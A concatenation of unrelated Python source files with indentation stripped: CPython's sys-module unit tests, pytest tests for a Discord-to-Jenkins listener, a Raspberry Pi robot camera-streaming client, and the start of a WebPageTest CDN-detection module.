def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
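# Illustrative example: on a typical 64-bit build struct.calcsize('Pi') is 12, while
# self.calcsize('Pi') pads the trailing int up to pointer alignment and returns 16.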
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi2P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3Pi'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', size(vh + 'lic'))
check('abc', size(vh + 'lic') + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
test_discord_listener.py
|
import asyncio
import logging
import re
from unittest.mock import MagicMock
import time
import threading
import pytest
from discord.ext.commands.bot import Bot
from bot.drivers.discord_listener import _EventListenerCog
from bot.drivers import DiscordListener
logger = logging.getLogger(__name__).parent
# Testing listener starting and stopping functionalities
def _wait_for_assertion(assertion):
# add timeout mechanism
is_assertion_false = True
while is_assertion_false:
try:
assertion()
is_assertion_false = False
except AssertionError:
time.sleep(1)
def test_blocking_listener(discord_listener: DiscordListener, discord_internal_bot: Bot):
stop_running = False
# pylint: disable=unused-argument
def mock_run(token):
while not stop_running:
time.sleep(1)
def assert_bot_not_running(): # How can I make this generic????
assert DiscordListener._bot_running is False
discord_internal_bot.run = MagicMock(side_effect=mock_run)
test_thread = threading.Thread(
target=discord_listener.start_listener, args=[True])
test_thread.start()
_wait_for_assertion(discord_internal_bot.run.assert_called)
assert DiscordListener._bot_running is True
stop_running = True
test_thread.join()
_wait_for_assertion(assert_bot_not_running)
def test_non_blocking_listener(discord_listener: DiscordListener, discord_internal_bot: Bot):
stop_running = False
# pylint: disable=unused-argument
def mock_run(token):
while not stop_running:
time.sleep(1)
async def stop_mock_run():
nonlocal stop_running
stop_running = True
discord_internal_bot.run = MagicMock(side_effect=mock_run)
discord_internal_bot.close = MagicMock(side_effect=stop_mock_run)
discord_listener.start_listener(False)
_wait_for_assertion(discord_internal_bot.run.assert_called)
assert DiscordListener._bot_running is True
discord_listener.stop_listener()
discord_internal_bot.close.assert_called()
assert DiscordListener._bot_running is False
def test_only_one_listener_at_a_time(discord_listener: DiscordListener, discord_internal_bot: Bot):
stop_running = False
n_runs = 0
# pylint: disable=unused-argument
def mock_run(token):
nonlocal n_runs
n_runs += 1
while not stop_running:
time.sleep(1)
async def stop_mock_run():
nonlocal stop_running
stop_running = True
discord_internal_bot.run = MagicMock(side_effect=mock_run)
discord_internal_bot.close = MagicMock(side_effect=stop_mock_run)
discord_listener.start_listener(False)
_wait_for_assertion(discord_internal_bot.run.assert_called)
assert DiscordListener._bot_running is True
assert n_runs == 1
discord_listener.start_listener(False)
assert n_runs == 1
discord_listener.stop_listener()
discord_internal_bot.close.assert_called()
assert DiscordListener._bot_running is False
# Testing listener specific message handling
def _call_on_message(discord_event_listener_cog: _EventListenerCog, sample_message):
try:
asyncio.run(discord_event_listener_cog.on_message(sample_message))
except Exception as ex:
logger.exception("Test error on message: {}".format(ex))
assert False
def _invalid_author_sample_message(sample_message, author_name, author_is_bot, embeds):
sample_message.author.name = author_name
sample_message.author.bot = author_is_bot
sample_message.embeds = embeds
return sample_message
def _change_embeds_author(sample_message, author):
sample_message.embeds[0].author = author
return sample_message.embeds
def _change_embeds_author_name(sample_message, author_name):
sample_message.embeds[0].author.name = author_name
return sample_message.embeds
@pytest.mark.parametrize("change_msg, get_bot_user", [
(lambda msg: _invalid_author_sample_message(msg, "Discord bot", True, None),
lambda msg: _invalid_author_sample_message(msg, "Discord bot", True, None).author),
(lambda msg: _invalid_author_sample_message(
msg, "GitHub", False, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "notGitHub", True, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "notGitHub", False, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "GitHub", True, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "GitHub", True, []), lambda msg: None),
(lambda msg: _invalid_author_sample_message(msg, "GitHub",
True, _change_embeds_author(msg, None)), lambda msg: None),
(lambda msg: _invalid_author_sample_message(msg, "GitHub", True,
_change_embeds_author_name(msg, "notInAllowedAuthors")), lambda msg: None)
])
def test_event_on_message_invalid_author(discord_event_listener_cog: _EventListenerCog, sample_message, change_msg, get_bot_user):
msg = change_msg(sample_message)
discord_event_listener_cog._bot.user = get_bot_user(sample_message)
discord_event_listener_cog._params_repository.get_github_allowed_authors = MagicMock(
return_value=["Test"])
discord_event_listener_cog._jenkins_service.trigger_build = MagicMock()
discord_event_listener_cog._discord_service.send_status_message_to_discord = MagicMock()
_call_on_message(discord_event_listener_cog, msg)
discord_event_listener_cog._jenkins_service.trigger_build.assert_not_called()
discord_event_listener_cog._discord_service.send_status_message_to_discord.assert_not_called()
def _invalid_pr_url(samples_message, embeds):
samples_message.embeds = embeds
return samples_message
def _change_embeds_url(samples_message, url):
samples_message.embeds[0].url = url
return samples_message.embeds
@pytest.mark.parametrize("change_msg", [
(lambda msg: _invalid_pr_url(msg, None)),
(lambda msg: _invalid_pr_url(msg, [])),
(lambda msg: _invalid_pr_url(msg, _change_embeds_url(msg, None))),
(lambda msg: _invalid_pr_url(msg, _change_embeds_url(
msg, "https://github.com/EvolvingVirtualAssistant/eva-cicd/unmatching-pr-url/a")))
])
def test_event_on_message_invalid_pr_url(discord_event_listener_cog: _EventListenerCog, sample_message, change_msg):
msg = change_msg(sample_message)
discord_event_listener_cog._params_repository.get_github_allowed_authors = MagicMock(
return_value=["Test"])
discord_event_listener_cog._jenkins_service.trigger_build = MagicMock()
discord_event_listener_cog._discord_service.send_status_message_to_discord = MagicMock()
_call_on_message(discord_event_listener_cog, msg)
discord_event_listener_cog._jenkins_service.trigger_build.assert_not_called()
discord_event_listener_cog._discord_service.send_status_message_to_discord.assert_not_called()
def test_event_on_message(discord_event_listener_cog: _EventListenerCog, sample_message, mock_any_arg):
# pylint: disable=unused-argument
async def mock_send_status_message_to_discord(channel, msg, url):
pass
# pylint: disable=unused-argument
def mock_trigger_build(pr_url, on_complete, on_error):
pass
discord_event_listener_cog._params_repository.get_github_allowed_authors = MagicMock(
return_value=["Test"])
discord_event_listener_cog._jenkins_service.trigger_build = MagicMock(
side_effect=mock_trigger_build)
discord_event_listener_cog._discord_service.send_status_message_to_discord = MagicMock(
side_effect=mock_send_status_message_to_discord)
url = re.match(r".*\/pull\/\d+", sample_message.embeds[0].url).group()
_call_on_message(discord_event_listener_cog, sample_message)
discord_event_listener_cog._jenkins_service.trigger_build.assert_called_with(
url, mock_any_arg, mock_any_arg)
|
lineRobotClient.py
|
import io
import socket
import struct
import time
import picamera
from gpiozero import Robot
import sys
from threading import Thread
robot = Robot(left=(27,24), right=(16,23))
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect(('192.168.1.67', 8000))
connectionStream = clientSocket.makefile('wb') # write binary image file to the connection
def instruction():
time.sleep(7)
while True:
msg = clientSocket.recv(1024)
msg = msg.decode('utf-8')
if msg == '1':
#print("1 - Going Forward")
robot.forward(speed=0.5)
elif msg == '2':
robot.left()
#print("2 - Going Left")
elif msg == '3':
robot.right()
#print("3 - Going right")
elif msg == '4':
#robot.backward()
pass
elif msg == '0':
pass
#robot.stop()
elif msg == '404':
print("Quiting, bye now")
sys.exit()
else:
print("Connected to Server!")
def video():
try:
with picamera.PiCamera() as camera:
camera.resolution = (320, 240) # pi camera resolution for testing (down from 640x480)
camera.framerate = 15 # 15 frames/sec
time.sleep(2) # give 2 secs for camera to initialize
start = time.time()
stream = io.BytesIO()
# send jpeg format video stream to the server
for frame in camera.capture_continuous(stream, 'jpeg', use_video_port=True):
connectionStream.write(struct.pack('<L', stream.tell()))
connectionStream.flush()
stream.seek(0)
connectionStream.write(stream.read())
if time.time() - start > 600:
break
stream.seek(0)
stream.truncate()
connectionStream.write(struct.pack('<L', 0))
finally:
connectionStream.close()
clientSocket.close()
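# Wire format used above (for reference): each frame is sent as a 4-byte little-endian
# length (struct format '<L') followed by the JPEG bytes; a length of 0 tells the
# server that the stream has ended.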
thread1 = Thread(target=video)
thread1.start()
thread2 = Thread(target=instruction)
thread2.start()
|
optimization_checks.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Run the various optimization checks"""
import binascii
import gzip
import logging
import multiprocessing
import os
import re
import shutil
import struct
import subprocess
import threading
import time
import monotonic
import ujson as json
class OptimizationChecks(object):
"""Threaded optimization checks"""
def __init__(self, job, task, requests):
self.job = job
self.task = task
self.running_checks = False
self.requests = requests
self.cdn_thread = None
self.hosting_thread = None
self.gzip_thread = None
self.image_thread = None
self.progressive_thread = None
self.cdn_time = None
self.hosting_time = None
self.gzip_time = None
self.image_time = None
self.progressive_time = None
self.cdn_results = {}
self.hosting_results = {}
self.gzip_results = {}
self.image_results = {}
self.progressive_results = {}
self.results = {}
self.dns_lookup_queue = multiprocessing.JoinableQueue()
self.dns_result_queue = multiprocessing.JoinableQueue()
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
# spell-checker: disable
self.cdn_cnames = {
'Advanced Hosters CDN': ['.pix-cdn.org'],
'afxcdn.net': ['.afxcdn.net'],
'Akamai': ['.akamai.net',
'.akamaized.net',
'.akamaiedge.net',
'.akamaihd.net',
'.edgesuite.net',
'.edgekey.net',
'.srip.net',
'.akamaitechnologies.com',
'.akamaitechnologies.fr'],
'Akamai China CDN': ['.tl88.net'],
'Alimama': ['.gslb.tbcache.com'],
'Amazon CloudFront': ['.cloudfront.net'],
'Aryaka': ['.aads1.net',
'.aads-cn.net',
'.aads-cng.net'],
'AT&T': ['.att-dsa.net'],
'Azion': ['.azioncdn.net',
'.azioncdn.com',
'.azion.net'],
'BelugaCDN': ['.belugacdn.com',
'.belugacdn.link'],
'Bison Grid': ['.bisongrid.net'],
'BitGravity': ['.bitgravity.com'],
'Blue Hat Network': ['.bluehatnetwork.com'],
'BO.LT': ['bo.lt'],
'BunnyCDN': ['.b-cdn.net'],
'Cachefly': ['.cachefly.net'],
'Caspowa': ['.caspowa.com'],
'Cedexis': ['.cedexis.net'],
'CDN77': ['.cdn77.net',
'.cdn77.org'],
'CDNetworks': ['.cdngc.net',
'.gccdn.net',
'.panthercdn.com'],
'CDNsun': ['.cdnsun.net'],
'CDNvideo': ['.cdnvideo.ru',
'.cdnvideo.net'],
'ChinaCache': ['.ccgslb.com'],
'ChinaNetCenter': ['.lxdns.com',
'.wscdns.com',
'.wscloudcdn.com',
'.ourwebpic.com'],
'Cloudflare': ['.cloudflare.com',
'.cloudflare.net'],
'Cotendo CDN': ['.cotcdn.net'],
'cubeCDN': ['.cubecdn.net'],
'Edgecast': ['edgecastcdn.net',
'.systemcdn.net',
'.transactcdn.net',
'.v1cdn.net',
'.v2cdn.net',
'.v3cdn.net',
'.v4cdn.net',
'.v5cdn.net'],
'Facebook': ['.facebook.com',
'.facebook.net',
'.fbcdn.net',
'.cdninstagram.com'],
'Fastly': ['.fastly.net',
'.fastlylb.net',
'.nocookie.net'],
'GoCache': ['.cdn.gocache.net'],
'Google': ['.google.',
'googlesyndication.',
'youtube.',
'.googleusercontent.com',
'googlehosted.com',
'.gstatic.com',
'.doubleclick.net'],
'HiberniaCDN': ['.hiberniacdn.com'],
'Highwinds': ['hwcdn.net'],
'Hosting4CDN': ['.hosting4cdn.com'],
'ImageEngine': ['.imgeng.in'],
'Incapsula': ['.incapdns.net'],
'Instart Logic': ['.insnw.net',
'.inscname.net'],
'Internap': ['.internapcdn.net'],
'jsDelivr': ['cdn.jsdelivr.net'],
'KeyCDN': ['.kxcdn.com'],
'KINX CDN': ['.kinxcdn.com',
'.kinxcdn.net'],
'LeaseWeb CDN': ['.lswcdn.net',
'.lswcdn.eu'],
'Level 3': ['.footprint.net',
'.fpbns.net'],
'Limelight': ['.llnwd.net',
'.llnwi.net',
'.lldns.net'],
'MediaCloud': ['.cdncloud.net.au'],
'Medianova': ['.mncdn.com',
'.mncdn.net',
'.mncdn.org'],
'Microsoft Azure': ['.vo.msecnd.net',
'.azureedge.net',
'.azure.microsoft.com'],
'Mirror Image': ['.instacontent.net',
'.mirror-image.net'],
'NetDNA': ['.netdna-cdn.com',
'.netdna-ssl.com',
'.netdna.com'],
'Netlify': ['.netlify.com'],
'NGENIX': ['.ngenix.net'],
'NYI FTW': ['.nyiftw.net',
'.nyiftw.com'],
'OnApp': ['.r.worldcdn.net',
'.r.worldssl.net'],
'Optimal CDN': ['.optimalcdn.com'],
'PageRain': ['.pagerain.net'],
'PUSHR': ['.pushrcdn.com'],
'Rackspace': ['.raxcdn.com'],
'Reapleaf': ['.rlcdn.com'],
'Reflected Networks': ['.rncdn1.com',
'.rncdn7.com'],
'ReSRC.it': ['.resrc.it'],
'Rev Software': ['.revcn.net',
'.revdn.net'],
'Roast.io': ['.roast.io'],
'Rocket CDN': ['.streamprovider.net'],
'section.io': ['.squixa.net'],
'SFR': ['cdn.sfr.net'],
'Simple CDN': ['.simplecdn.net'],
'Singular CDN': ['.singularcdn.net.br'],
'StackPath': ['.stackpathdns.com'],
'SwiftCDN': ['.swiftcdn1.com',
'.swiftserve.com'],
'Taobao': ['.gslb.taobao.com',
'tbcdn.cn',
'.taobaocdn.com'],
'Telenor': ['.cdntel.net'],
'TRBCDN': ['.trbcdn.net'],
'Twitter': ['.twimg.com'],
'UnicornCDN': ['.unicorncdn.net'],
'VegaCDN': ['.vegacdn.vn',
'.vegacdn.com'],
'VoxCDN': ['.voxcdn.net'],
'WordPress': ['.wp.com',
'.wordpress.com',
'.gravatar.com'],
'XLabs Security': ['.xlabs.com.br',
'.armor.zone'],
'Yahoo': ['.ay1.b.yahoo.com',
'.yimg.',
'.yahooapis.com'],
'Yottaa': ['.yottaa.net'],
'Zenedge': ['.zenedge.net']
}
self.cdn_headers = {
'Airee': [{'Server': 'Airee'}],
'Amazon CloudFront': [{'Via': 'CloudFront'}],
'Aryaka': [{'X-Ar-Debug': ''}],
'BelugaCDN': [{'Server': 'Beluga'},
{'X-Beluga-Cache-Status': ''}],
'BunnyCDN': [{'Server': 'BunnyCDN'}],
'Caspowa': [{'Server': 'Caspowa'}],
'CDN': [{'X-Edge-IP': ''},
{'X-Edge-Location': ''}],
'CDNetworks': [{'X-Px': ''}],
'ChinaNetCenter': [{'X-Cache': 'cache.51cdn.com'}],
'Cloudflare': [{'Server': 'cloudflare'}],
'Edgecast': [{'Server': 'ECS'},
{'Server': 'ECAcc'},
{'Server': 'ECD'}],
'Fastly': [{'X-Served-By': 'cache-', 'X-Cache': ''}],
'Fly': [{'Server': 'Fly.io'}],
'GoCache': [{'Server': 'gocache'}],
'Google': [{'Server': 'sffe'},
{'Server': 'gws'},
{'Server': 'GSE'},
{'Server': 'Golfe2'},
{'Via': 'google'}],
'HiberniaCDN': [{'Server': 'hiberniacdn'}],
'Highwinds': [{'X-HW': ''}],
'ImageEngine': [{'Server': 'ScientiaMobile ImageEngine'}],
'Incapsula': [{'X-CDN': 'Incapsula'},
{'X-Iinfo': ''}],
'Instart Logic': [{'X-Instart-Request-ID': 'instart'}],
'LeaseWeb CDN': [{'Server': 'leasewebcdn'}],
'Medianova': [{'Server': 'MNCDN'}],
'Naver': [{'Server': 'Testa/'}],
'NetDNA': [{'Server': 'NetDNA'}],
'Netlify': [{'Server': 'Netlify'}],
'NYI FTW': [{'X-Powered-By': 'NYI FTW'},
{'X-Delivered-By': 'NYI FTW'}],
'Optimal CDN': [{'Server': 'Optimal CDN'}],
'OVH CDN': [{'X-CDN-Geo': ''},
{'X-CDN-Pop': ''}],
'PUSHR': [{'Via': 'PUSHR'}],
'ReSRC.it': [{'Server': 'ReSRC'}],
'Rev Software': [{'Via': 'Rev-Cache'},
{'X-Rev-Cache': ''}],
'Roast.io': [{'Server': 'Roast.io'}],
'Rocket CDN': [{'x-rocket-node': ''}],
'section.io': [{'section-io-id': ''}],
'Singular CDN': [{'Server': 'SingularCDN'}],
'Sucuri Firewall': [{'Server': 'Sucuri/Cloudproxy'},
{'x-sucuri-id': ''}],
'Surge': [{'Server': 'SurgeCDN'}],
'Twitter': [{'Server': 'tsa_b'}],
'UnicornCDN': [{'Server': 'UnicornCDN'}],
'XLabs Security': [{'x-cdn': 'XLabs Security'}],
'Yunjiasu': [{'Server': 'yunjiasu'}],
'Zenedge': [{'X-Cdn': 'Zenedge'}]
}
# spell-checker: enable
def start(self):
"""Start running the optimization checks"""
logging.debug('Starting optimization checks...')
